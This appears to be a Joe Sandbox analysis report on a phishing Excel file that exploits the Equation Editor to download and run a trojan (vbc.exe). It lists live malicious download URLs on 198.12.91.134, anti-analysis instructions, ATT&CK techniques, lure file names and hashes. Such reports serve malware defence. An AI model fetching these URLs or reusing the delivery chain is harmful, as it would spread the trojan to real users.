0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1748

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B40B7 rdtsc

6_2_003B40B7

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B73B4 mov eax, dword ptr fs:[00000030h]	6_2_003B73B4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3441 mov eax, dword ptr fs:[00000030h]	6_2_003B3441
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B853B mov eax, dword ptr fs:[00000030h]	6_2_003B853B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5589 mov eax, dword ptr fs:[00000030h]	6_2_003B5589
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7898 mov eax, dword ptr fs:[00000030h]	6_2_003B7898
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2D3B mov eax, dword ptr fs:[00000030h]	6_2_003B2D3B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2350876912.00000000009F0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution12	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Security Software Discovery41	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Virtualization/Sandbox Evasion1	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol121	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	System Information Discovery33	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	22%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	11%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	22%	Virustotal		Browse
C:\Users\Public\vbc.exe	11%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://198.12.91.134/win/vbc.exe	18%	Virustotal		Browse
http://198.12.91.134/win/vbc.exe	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://101.99.94.119/WEALTH_PRUu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.12.91.134/win/vbc.exe	true	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://101.99.94.119/WEALTH_PRUu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.2352286513.0000000003807000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.day.com/dam/1.0	BEC2566A.emf.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.12.91.134	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457915
Start date:	02.08.2021
Start time:	14:49:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Exhibitions Order Detailed list.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@4/19@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.2% (good quality ratio 3.9%) Quality average: 21% Quality standard deviation: 28.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:50:00	API Interceptor	40x Sleep call for process: EQNEDT32.EXE modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.12.91.134	Request For Quotation.xlsx	Get hash	malicious	Browse	198.12.91.134/win/vbc.exe
	Invoice & BL copy.xlsx	Get hash	malicious	Browse	198.12.91.134/regasm/vbc.exe
	Order Request for Quotation.xlsx	Get hash	malicious	Browse	198.12.91.134/hkcmd/vbc.exe
	Order Request.xlsx	Get hash	malicious	Browse	198.12.91.134/cvc/vbc.exe
	Request For Quotation.xlsx	Get hash	malicious	Browse	198.12.91.134/html/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	Scanned Documents 001.doc	Get hash	malicious	Browse	192.3.110.170
	56 INV & PL.xlsx	Get hash	malicious	Browse	192.227.228.106
	fYybtaBD8d	Get hash	malicious	Browse	23.95.226.100
	RK1WguFBBm	Get hash	malicious	Browse	23.95.226.100
	N9Txf48E6w	Get hash	malicious	Browse	23.95.226.100
	ecy3RBcsjD	Get hash	malicious	Browse	23.95.226.100
	sBPMSpHW.exe	Get hash	malicious	Browse	216.170.126.139
	6KOGDsrr1Y	Get hash	malicious	Browse	23.95.226.100
	IhLZF4G4X5	Get hash	malicious	Browse	23.95.226.100
	P8TAq01Hlt	Get hash	malicious	Browse	23.95.226.100
	DXgTLFI71N	Get hash	malicious	Browse	23.95.226.100
	Might.mips	Get hash	malicious	Browse	23.95.221.126
	Lv08gOEYJ3	Get hash	malicious	Browse	107.172.179.176
	1dQpke5WNE	Get hash	malicious	Browse	104.170.179.51
	aa64.dll	Get hash	malicious	Browse	192.3.99.71
	RYP-210712.xlsx	Get hash	malicious	Browse	198.12.91.161
	PO 0420 vessel MV AQUAKATIE..xlsx	Get hash	malicious	Browse	192.3.13.125
	SKMBT_C5522106221301.xlsx	Get hash	malicious	Browse	192.210.214.144
	8gQIIxr1sN	Get hash	malicious	Browse	107.175.44.255
	SecuriteInfo.com.ELF.Mirai-BHTTrj.12818.18493	Get hash	malicious	Browse	107.175.94.101

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	114688
Entropy (8bit):	6.650522833717378
Encrypted:	false
SSDEEP:	1536:EAPGkc1ug6GUMu+Yg2WGI5XZ4QmiPYefCGk4H:X2bUMEWfXZiea
MD5:	27BF14807BC9D5CD2D823293F43C3A3A
SHA1:	08EEED11867AA351BE0D6C48DA283721EE6C0769
SHA-256:	55FD5769DF0DF23D4140A34D07DC2C833B43AC1060F4D0992BDD27316041C69A
SHA-512:	C2BCD733A0BFD1B9E56B630E4FAE6A45951A843946A389F8987C48A3B047CA9B9F74A5A01AFC7D7589F156691220E474553229F485B6DE4F902DB566A6A0D245
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 22%, Browse Antivirus: ReversingLabs, Detection: 11%
Reputation:	low
IE Cache URL:	http://198.12.91.134/win/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.................@..........D........P....@..................................`......................................tK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32A28A08.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52F13E97.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5868B96E.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DB07460.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\623BCD02.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 687 x 111, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	7.758903050821124
Encrypted:	false
SSDEEP:	48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
MD5:	A5D66CCBEE7946308A985B0FA9CC74F7
SHA1:	D86FFD2A310B16C59849B8E574B673E36643FDDF
SHA-256:	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
SHA-512:	7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..\|..Zl..2>.M..c...<..h..~...^..<....i.K..-\|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.\|........0.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6DB428E1.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71EF57AC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\855D19C5.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EA69F63.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.077266535268398
Encrypted:	false
SSDEEP:	96:+SZL6BGj/MQU8DbwiMOtWmVz76F2MqdTfOYL/xRp7uGkmrI:5DjU+H3tWa6WdTfOYLpR8d
MD5:	3F5F7384FF38DDA31633C2831A7ABC73
SHA1:	974D94DCD1F32FC128CCD43C30ECDDEDC0EA3BD2
SHA-256:	3379A0A988A850FB15F4F961DADEA37C8A0098A1913AA986007092895731DA73
SHA-512:	FAA52F817B6E9941A051E0FA99AF1E441853FD2FC8E5D2151ECA5EF5815D64CC3A4F6B6584FBBD26A932870E7A189C0B83C938B998F88AF53D028B5A48ECF72C
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................P.6.).X...x...d.............................p....\.............<.....p........6Pv...p....`..p0.P.$y.vHM.................v....$.....u.d.......t...^.p.....^.p.I..HM....).....-...$...<.v................<.>v.Z.v....X.hd....0.P........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A50033D4.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
